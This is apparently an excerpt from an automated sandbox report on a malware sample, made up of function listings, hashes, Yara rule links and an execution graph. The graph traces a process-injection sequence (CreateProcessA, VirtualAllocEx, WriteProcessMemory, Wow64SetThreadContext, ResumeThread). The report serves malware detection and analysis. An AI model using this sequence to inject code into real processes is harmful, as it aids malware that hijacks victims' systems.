                                  • Opcode Fuzzy Hash: a8e08fe264d3c07123dd34689dad55efe772cca15f74b54cd4211f585490b1df
                                  • Instruction Fuzzy Hash: 3401B132B100255BDF94AA689D54AEB73EBDFC8610F014239E40AE7354EF289C0247D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02B3D03F Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3279803954.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2b3d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 98424e7152c88580a8296e016b916926a263cf16f7a6e5d9123e35720a456ccf
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 1B11BB75504284CFCB12CF14C9C4B15BBA2FB88314F24C6A9D8494B252C33AD44ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A73C50 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb723015a69e064f8e91aeed07302f8288da1de27361155a405bced6fe2affd8
                                  • Instruction ID: 3138ce4cf11d6484cecf105c4d5d33b35b367ddb0d003aaee04a149ae6e9c37d
                                  • Opcode Fuzzy Hash: bb723015a69e064f8e91aeed07302f8288da1de27361155a405bced6fe2affd8
                                  • Instruction Fuzzy Hash: 4A11B3B5D01259AFCB00DF9AD984ADEFFB4FB49310F10852AE518A7240C375A554CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02B3D127 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3279803954.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2b3d000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction ID: 0e6ffa5c8c8ad564bdd2d14a6bc2145faeac7f319a01d655b80c752e526bf142
                                  • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction Fuzzy Hash: 2B119D75504680CFDB16CF14D9C4B15BFA2FB88318F24C6ADD8494B666C33AD88ACB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A741D8 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 439be854a867fbf53d4977657ce938f68c9fa9b5a7503a7ed7f49448294091a5
                                  • Instruction ID: bb3dff5dd51ed7adabfb20a7aa992fe14b45f8a9cf70a2365f03d533d60490e6
                                  • Opcode Fuzzy Hash: 439be854a867fbf53d4977657ce938f68c9fa9b5a7503a7ed7f49448294091a5
                                  • Instruction Fuzzy Hash: E301A234B100205BDB65A6AD9854B1BE6DADBC9710F20847AE51ACB344DD65DC0183D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7F15A Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc52f82ef2d11cd1622b034a8f65a9b3859721fe7d7ac8c29b584c91036512c5
                                  • Instruction ID: f591c30b4fedac42364b116ffebcb24acdf95d7815b4bea67ac93f041521f666
                                  • Opcode Fuzzy Hash: bc52f82ef2d11cd1622b034a8f65a9b3859721fe7d7ac8c29b584c91036512c5
                                  • Instruction Fuzzy Hash: 46012679B000108FCB26EB3CDC5076E67D7DB88624F108829E60ECB344DE24EC0347A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7F168 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86e1ea1dbbbf1702a9c4dcb25f89ced29bc7d1b8f67c559e29634df6ba972315
                                  • Instruction ID: 21d1027e62e19605035c753763c8b8ef0768657d7b18650a6633f820d6452761
                                  • Opcode Fuzzy Hash: 86e1ea1dbbbf1702a9c4dcb25f89ced29bc7d1b8f67c559e29634df6ba972315
                                  • Instruction Fuzzy Hash: A001AF75B100115FCB66AA7DDC54B2FB7EADBC9A24F108839E60ACB344DE25ED0243E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7A2D8 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2b83b1d6ba1447901d0339c49cbbd9df95b90a4020c8af7977a2c8a27724206
                                  • Instruction ID: b1624da05cac302ebcd08760d966e5e3e6e8df21e4fdd71a787df5f63a68364b
                                  • Opcode Fuzzy Hash: c2b83b1d6ba1447901d0339c49cbbd9df95b90a4020c8af7977a2c8a27724206
                                  • Instruction Fuzzy Hash: FE018134B001256FCB61EA7DE954B6EB7EADB89710F108438E60ACB354EF25EC018784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7C782 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a28b65504997fb6ec58756b0782932aff1d6f6e539c681e05ed016830ed5ad7e
                                  • Instruction ID: 61691d2cfd55b65929821435327309292db9b0ab02cbe074be4afec8eaa034d7
                                  • Opcode Fuzzy Hash: a28b65504997fb6ec58756b0782932aff1d6f6e539c681e05ed016830ed5ad7e
                                  • Instruction Fuzzy Hash: 1201F735E15264AFCB15AF79EC40B9A7776FB85320F004579E506EB385D7359804CBC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7C790 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53fc6e892b61d40e8bd74f4bfa0cdcdf5b1cbad8dda4cbf733a6760e4a8d4cfd
                                  • Instruction ID: 7263c8e25c4bccb191504e1a5c9c115c4be9630f305792d4feb91c56291d7b7c
                                  • Opcode Fuzzy Hash: 53fc6e892b61d40e8bd74f4bfa0cdcdf5b1cbad8dda4cbf733a6760e4a8d4cfd
                                  • Instruction Fuzzy Hash: 5D01A931F102249FDF54AE6AEC54A9E7776F785314F104539E906EB344DB31A8048BC4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A76448 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87efb6519f56c3cc7b131f1f3ebc5714406bf3c154255657ab5b2f56db5ec7bb
                                  • Instruction ID: 7fc38fff83b40e808a8b567af074151c5017592d32d5885a780a13cd4830303a
                                  • Opcode Fuzzy Hash: 87efb6519f56c3cc7b131f1f3ebc5714406bf3c154255657ab5b2f56db5ec7bb
                                  • Instruction Fuzzy Hash: F9E092709191889EDF51DBB09F6535A3B749B02108F2144F7C444CB143D175CA099340
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A76458 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b0a2fcb87986961129f151e017e3fe5feaa12096ce5338145710a1fb90bb0c2
                                  • Instruction ID: 2cf3b11682c64adfc7d10209955eac26c23fccb7c040efc9b0116df29b895618
                                  • Opcode Fuzzy Hash: 3b0a2fcb87986961129f151e017e3fe5feaa12096ce5338145710a1fb90bb0c2
                                  • Instruction Fuzzy Hash: F9E0C2B0E10108ABDF50EFB0DF6579E73ACD702204F2084A4D408CB201E176CA059380
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 06A77668 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3810553869
                                  • Opcode ID: e04d2e951beaba7ccb467c355716f8467841dd8e0dcba3fb245c4cc6717c4567
                                  • Instruction ID: cbd0f769ab69cba76b561b925fd447de0b3d1d687e73ab8825d927a17bfefdd9
                                  • Opcode Fuzzy Hash: e04d2e951beaba7ccb467c355716f8467841dd8e0dcba3fb245c4cc6717c4567
                                  • Instruction Fuzzy Hash: E5121D30E012198FDB64EF65C994AAEB7B6FF89301F2085A9D405AB364DB31ED45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7A8F8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: ffe2ce6fd468ca0c6b0a535a386bd1f4b35d113d487494d6068b516290ff2cf0
                                  • Instruction ID: a6d96e1bfd76eb3bce6654d229637d91d7dc9a2ebbbf86d217d09f08305d3982
                                  • Opcode Fuzzy Hash: ffe2ce6fd468ca0c6b0a535a386bd1f4b35d113d487494d6068b516290ff2cf0
                                  • Instruction Fuzzy Hash: 77915330A00209EFEB68EF65DE947AE77F6FF84300F248529D501AB294DB74AC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A77068 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 7292f9b11f0527d92ded0586e4fe11be0623e36cba51474f07a27b22902430ef
                                  • Instruction ID: 9d7d97007a3f4651e7d1c96dc06a8cfc82ac8b3e23ee9ae20d6c166099e0cf28
                                  • Opcode Fuzzy Hash: 7292f9b11f0527d92ded0586e4fe11be0623e36cba51474f07a27b22902430ef
                                  • Instruction Fuzzy Hash: 28F12D30B01219CFDB55EFA5D994A6EB7B7BF84304F248568D406AB368DB35EC42CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A783A0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: fd9f4736c5064c94472653ab9807e88de4949fb96ca26f7155587b52a592196b
                                  • Instruction ID: 9e1ae3d8d99e11979cb25cb3811983a6c80eb949d5beef876bd283c40a3c2a8e
                                  • Opcode Fuzzy Hash: fd9f4736c5064c94472653ab9807e88de4949fb96ca26f7155587b52a592196b
                                  • Instruction Fuzzy Hash: 98B12D30E102198FDB64EF65D9986AEB7B6FF84314F248939D406AB354DB78DC41CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A787B8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq$$jq$$jq
                                  • API String ID: 0-2974078839
                                  • Opcode ID: 12fbfb8259fc901c838f4f72cf7fccbb69b03d4e3f4df234fbae0f404cc64bc5
                                  • Instruction ID: 803a81259c84010cd6ef5c38df2d842355b820ea9a86c58c36e1e9e52a6739a0
                                  • Opcode Fuzzy Hash: 12fbfb8259fc901c838f4f72cf7fccbb69b03d4e3f4df234fbae0f404cc64bc5
                                  • Instruction Fuzzy Hash: 0B51A031B002028FDB54EF39D994A6AB7F6FF84340F148668D4069B3A9DB35EC44CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7AC8B Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 0195f5a5d08256ca6f9474cd742ddb76bed5162fd34d00543268c49c8c39f4bb
                                  • Instruction ID: a2b798261716c9ca981a7c9cb6f2ce70d332c563f1ae139ef843a71c2ddaba8b
                                  • Opcode Fuzzy Hash: 0195f5a5d08256ca6f9474cd742ddb76bed5162fd34d00543268c49c8c39f4bb
                                  • Instruction Fuzzy Hash: 4B518E30E10218AFDF65EB64D984AAEB7F6EF85301F248529D906EB355DB31EC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:11.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:194
                                  Total number of Limit Nodes:12
                                  execution_graph 28241 1494668 28242 149467a 28241->28242 28243 1494686 28242->28243 28247 1494778 28242->28247 28252 1494204 28243->28252 28245 14946a5 28248 149479d 28247->28248 28256 1494879 28248->28256 28260 1494888 28248->28260 28253 149420f 28252->28253 28268 1495e78 28253->28268 28255 14977cc 28255->28245 28258 14948af 28256->28258 28257 149498c 28257->28257 28258->28257 28264 14944e4 28258->28264 28262 14948af 28260->28262 28261 149498c 28261->28261 28262->28261 28263 14944e4 CreateActCtxA 28262->28263 28263->28261 28265 1495918 CreateActCtxA 28264->28265 28267 14959db 28265->28267 28267->28267 28269 1495e83 28268->28269 28272 14973b0 28269->28272 28271 149794d 28271->28255 28273 14973bb 28272->28273 28276 14973e0 28273->28276 28275 1497a22 28275->28271 28277 14973eb 28276->28277 28280 1497410 28277->28280 28279 1497b25 28279->28275 28281 149741b 28280->28281 28283 1498d93 28281->28283 28286 149b440 28281->28286 28282 1498dd1 28282->28279 28283->28282 28290 149d530 28283->28290 28294 149b468 28286->28294 28298 149b478 28286->28298 28287 149b456 28287->28283 28291 149d551 28290->28291 28292 149d575 28291->28292 28321 149d6e0 28291->28321 28292->28282 28295 149b478 28294->28295 28301 149b55f 28295->28301 28296 149b487 28296->28287 28300 149b55f 2 API calls 28298->28300 28299 149b487 28299->28287 28300->28299 28302 149b581 28301->28302 28303 149b5a4 28301->28303 28302->28303 28309 149b7f8 28302->28309 28313 149b808 28302->28313 28303->28296 28304 149b59c 28304->28303 28305 149b7a8 GetModuleHandleW 28304->28305 28306 149b7d5 28305->28306 28306->28296 28310 149b81c 28309->28310 28311 149b841 28310->28311 28317 149afb0 28310->28317 28311->28304 28314 149b81c 28313->28314 28315 149afb0 LoadLibraryExW 28314->28315 28316 149b841 28314->28316 28315->28316 28316->28304 28318 149b9e8 LoadLibraryExW 28317->28318 28320 149ba61 28318->28320 28320->28311 28322 149d6ed 28321->28322 28324 149d727 28322->28324 28325 149d018 28322->28325 28324->28292 28326 149d023 28325->28326 28327 149e038 28326->28327 28329 149d144 28326->28329 28330 149d14f 28329->28330 28331 1497410 2 API calls 28330->28331 28332 149e0a7 28331->28332 28332->28327 28337 149d7f8 28338 149d83e GetCurrentProcess 28337->28338 28340 149d889 28338->28340 28341 149d890 GetCurrentThread 28338->28341 28340->28341 28342 149d8cd GetCurrentProcess 28341->28342 28343 149d8c6 28341->28343 28344 149d903 GetCurrentThreadId 28342->28344 28343->28342 28346 149d95c 28344->28346 28092 99cd6da 28097 99cf7c0 28092->28097 28110 99cf7d0 28092->28110 28123 99cf836 28092->28123 28093 99cd6ee 28098 99cf7ea 28097->28098 28107 99cf7f2 28098->28107 28137 d8b028a 28098->28137 28141 d8b0195 28098->28141 28146 d8b0533 28098->28146 28151 d8b015e 28098->28151 28156 d8b01d8 28098->28156 28163 d8b083b 28098->28163 28168 d8b01fb 28098->28168 28175 d8b0440 28098->28175 28180 d8b026d 28098->28180 28185 d8b032f 28098->28185 28107->28093 28111 99cf7ea 28110->28111 28112 99cf7f2 28111->28112 28113 d8b028a 2 API calls 28111->28113 28114 d8b032f 2 API calls 28111->28114 28115 d8b026d 2 API calls 28111->28115 28116 d8b0440 2 API calls 28111->28116 28117 d8b01fb 4 API calls 28111->28117 28118 d8b083b 2 API calls 28111->28118 28119 d8b01d8 4 API calls 28111->28119 28120 d8b015e 2 API calls 28111->28120 28121 d8b0533 2 API calls 28111->28121 28122 d8b0195 2 API calls 28111->28122 28112->28093 28113->28112 28114->28112 28115->28112 28116->28112 28117->28112 28118->28112 28119->28112 28120->28112 28121->28112 28122->28112 28124 99cf7c4 28123->28124 28126 99cf839 28123->28126 28125 99cf7f2 28124->28125 28127 d8b028a 2 API calls 28124->28127 28128 d8b032f 2 API calls 28124->28128 28129 d8b026d 2 API calls 28124->28129 28130 d8b0440 2 API calls 28124->28130 28131 d8b01fb 4 API calls 28124->28131 28132 d8b083b 2 API calls 28124->28132 28133 d8b01d8 4 API calls 28124->28133 28134 d8b015e 2 API calls 28124->28134 28135 d8b0533 2 API calls 28124->28135 28136 d8b0195 2 API calls 28124->28136 28125->28093 28126->28093 28127->28125 28128->28125 28129->28125 28130->28125 28131->28125 28132->28125 28133->28125 28134->28125 28135->28125 28136->28125 28138 d8b028b 28137->28138 28190 99ccdd8 28138->28190 28194 99ccde0 28138->28194 28143 d8b024c 28141->28143 28142 d8b081e 28143->28142 28198 99cd028 28143->28198 28202 99cd020 28143->28202 28147 d8b0539 28146->28147 28206 99cd118 28147->28206 28210 99cd112 28147->28210 28148 d8b055c 28148->28107 28152 d8b016a 28151->28152 28214 99cce88 28152->28214 28218 99cce90 28152->28218 28153 d8b00f8 28153->28107 28157 d8b01e9 28156->28157 28158 d8b01a3 28156->28158 28161 99cce88 Wow64SetThreadContext 28157->28161 28162 99cce90 Wow64SetThreadContext 28157->28162 28159 99ccdd8 ResumeThread 28158->28159 28160 99ccde0 ResumeThread 28158->28160 28159->28158 28160->28158 28161->28158 28162->28158 28164 d8b016a 28163->28164 28164->28163 28166 99cce88 Wow64SetThreadContext 28164->28166 28167 99cce90 Wow64SetThreadContext 28164->28167 28165 d8b00f8 28165->28107 28166->28165 28167->28165 28169 d8b01ff 28168->28169 28173 99cce88 Wow64SetThreadContext 28169->28173 28174 99cce90 Wow64SetThreadContext 28169->28174 28170 d8b01a3 28171 99ccdd8 ResumeThread 28170->28171 28172 99ccde0 ResumeThread 28170->28172 28171->28170 28172->28170 28173->28170 28174->28170 28176 d8b0463 28175->28176 28178 99cd028 WriteProcessMemory 28176->28178 28179 99cd020 WriteProcessMemory 28176->28179 28177 d8b04ba 28177->28107 28178->28177 28179->28177 28181 d8b0978 28180->28181 28222 99ccf68 28181->28222 28226 99ccf60 28181->28226 28182 d8b08d9 28182->28107 28186 d8b0335 28185->28186 28188 99cd028 WriteProcessMemory 28186->28188 28189 99cd020 WriteProcessMemory 28186->28189 28187 d8b03b4 28187->28107 28188->28187 28189->28187 28191 99cce20 ResumeThread 28190->28191 28193 99cce51 28191->28193 28193->28138 28195 99cce20 ResumeThread 28194->28195 28197 99cce51 28195->28197 28197->28138 28199 99cd070 WriteProcessMemory 28198->28199 28201 99cd0c7 28199->28201 28201->28143 28203 99cd070 WriteProcessMemory 28202->28203 28205 99cd0c7 28203->28205 28205->28143 28207 99cd163 ReadProcessMemory 28206->28207 28209 99cd1a7 28207->28209 28209->28148 28211 99cd163 ReadProcessMemory 28210->28211 28213 99cd1a7 28211->28213 28213->28148 28215 99cced5 Wow64SetThreadContext 28214->28215 28217 99ccf1d 28215->28217 28217->28153 28219 99cced5 Wow64SetThreadContext 28218->28219 28221 99ccf1d 28219->28221 28221->28153 28223 99ccfa8 VirtualAllocEx 28222->28223 28225 99ccfe5 28223->28225 28225->28182 28227 99ccfa8 VirtualAllocEx 28226->28227 28229 99ccfe5 28227->28229 28229->28182 28230 149da40 DuplicateHandle 28231 149dad6 28230->28231 28232 d8b1040 28233 d8b11cb 28232->28233 28234 d8b1066 28232->28234 28234->28233 28237 d8b12b8 PostMessageW 28234->28237 28239 d8b12c0 PostMessageW 28234->28239 28238 d8b132c 28237->28238 28238->28234 28240 d8b132c 28239->28240 28240->28234 28333 99cd2b0 28334 99cd339 CreateProcessA 28333->28334 28336 99cd4fb 28334->28336

                                  Executed Functions

                                  Function 0149D7F8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 149d7f8-149d887 GetCurrentProcess 301 149d889-149d88f 297->301 302 149d890-149d8c4 GetCurrentThread 297->302 301->302 303 149d8cd-149d901 GetCurrentProcess 302->303 304 149d8c6-149d8cc 302->304 306 149d90a-149d922 303->306 307 149d903-149d909 303->307 304->303 310 149d92b-149d95a GetCurrentThreadId 306->310 307->306 311 149d95c-149d962 310->311 312 149d963-149d9c5 310->312 311->312
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0149D876
                                  • GetCurrentThread.KERNEL32 ref: 0149D8B3
                                  • GetCurrentProcess.KERNEL32 ref: 0149D8F0
                                  • GetCurrentThreadId.KERNEL32 ref: 0149D949
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: b1bee06a9b298e6e55a803787defee116187aaff9e830166fec81c45fa4bb11d
                                  • Instruction ID: c7321b668c16304c6362687c1c9e314cf2386cc8aa13f0f94a3fde60cd2ace9b
                                  • Opcode Fuzzy Hash: b1bee06a9b298e6e55a803787defee116187aaff9e830166fec81c45fa4bb11d
                                  • Instruction Fuzzy Hash: 765125B09003098FDB18DFAAD548BDEBFF5AF88314F20845AE519A7361DB389944CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CD2A4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 550 99cd2a4-99cd345 552 99cd37e-99cd39e 550->552 553 99cd347-99cd351 550->553 560 99cd3d7-99cd406 552->560 561 99cd3a0-99cd3aa 552->561 553->552 554 99cd353-99cd355 553->554 555 99cd378-99cd37b 554->555 556 99cd357-99cd361 554->556 555->552 558 99cd365-99cd374 556->558 559 99cd363 556->559 558->558 562 99cd376 558->562 559->558 567 99cd43f-99cd4f9 CreateProcessA 560->567 568 99cd408-99cd412 560->568 561->560 563 99cd3ac-99cd3ae 561->563 562->555 565 99cd3b0-99cd3ba 563->565 566 99cd3d1-99cd3d4 563->566 569 99cd3bc 565->569 570 99cd3be-99cd3cd 565->570 566->560 581 99cd4fb-99cd501 567->581 582 99cd502-99cd588 567->582 568->567 571 99cd414-99cd416 568->571 569->570 570->570 572 99cd3cf 570->572 573 99cd418-99cd422 571->573 574 99cd439-99cd43c 571->574 572->566 576 99cd424 573->576 577 99cd426-99cd435 573->577 574->567 576->577 577->577 578 99cd437 577->578 578->574 581->582 592 99cd598-99cd59c 582->592 593 99cd58a-99cd58e 582->593 595 99cd5ac-99cd5b0 592->595 596 99cd59e-99cd5a2 592->596 593->592 594 99cd590 593->594 594->592 598 99cd5c0-99cd5c4 595->598 599 99cd5b2-99cd5b6 595->599 596->595 597 99cd5a4 596->597 597->595 600 99cd5d6-99cd5dd 598->600 601 99cd5c6-99cd5cc 598->601 599->598 602 99cd5b8 599->602 603 99cd5df-99cd5ee 600->603 604 99cd5f4 600->604 601->600 602->598 603->604 606 99cd5f5 604->606 606->606
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 099CD4E6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: e2f87264ada33342697c0c167804e0a2fdf5003a17698fd1d5bb9c0b6238541e
                                  • Instruction ID: 17b640a7fca2284c9d875253827037e7b2097714ca16c9debe9acc32290fd81c
                                  • Opcode Fuzzy Hash: e2f87264ada33342697c0c167804e0a2fdf5003a17698fd1d5bb9c0b6238541e
                                  • Instruction Fuzzy Hash: B0A16BB1D00259DFDF14DF68CD51BADBBB2BF48304F14816AE848A7294DB749981CF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CD2B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
